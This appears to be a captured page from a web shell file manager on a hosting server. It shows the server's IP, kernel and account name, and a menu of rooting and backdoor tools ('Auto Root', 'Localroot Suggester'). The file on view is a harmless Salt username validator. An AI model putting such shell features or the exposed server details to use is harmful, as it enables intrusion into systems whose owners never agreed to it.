Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.6 /
site-packages /
salt /
utils /
validate /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2022-10-11 05:09
__init__.py
96
B
-rw-r--r--
2022-05-16 09:16
net.py
2.21
KB
-rw-r--r--
2022-05-16 09:16
path.py
1.78
KB
-rw-r--r--
2022-05-16 09:16
user.py
433
B
-rw-r--r--
2022-05-16 09:16
Save
Rename
""" Various user validation utilities """ import logging import re log = logging.getLogger(__name__) VALID_USERNAME = re.compile(r"[a-z_][a-z0-9_-]*[$]?", re.IGNORECASE) def valid_username(user): """ Validates a username based on the guidelines in `useradd(8)` """ if not isinstance(user, str): return False if len(user) > 32: return False return VALID_USERNAME.match(user) is not None